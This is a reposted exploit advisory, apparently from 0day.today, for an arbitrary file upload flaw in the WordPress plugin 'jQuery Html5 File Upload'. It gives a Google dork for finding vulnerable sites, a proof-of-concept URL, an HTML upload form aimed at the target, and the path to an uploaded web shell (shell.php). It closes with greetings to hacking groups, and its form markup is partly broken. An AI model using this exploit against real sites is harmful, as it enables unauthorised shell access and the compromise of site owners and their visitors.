Unknown On 12/05/16

#############################
 
# Exploit Title: Wordpress Plugins jQuery Html5 File Upload Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/jquery-html5-file-upload/
# Date: 2016-04-17
# Exploit Author: AnoaGhost
# Version: Any Version
# Tested on: Windows, Linux
 
#############################
 
Poc :
targe.com/wp-admin/admin-ajax.php?action=load_ajax_function
 
Exploit HTML :
 
<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload By AnoaGhost</font><br>
<form method="POST" action="target.com/
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
 
Shell Access :
target.com/wp-content/uploads/files/guest/shell.php
 
Target :
 
#############################
 
Note : This Exploit Is Same Of JSON File Upload and jQuery File Upload
 
#################
 
Greet'z : Indonesian Intelegent Security , Fallaga Team , Kuroi'Sh , h4ntu l@ut , Prosox , Gang Dz , And My Friends :)
 
#  0day.today [2016-05-12]  #

Leave a Reply

Subscribe to Posts | Subscribe to Comments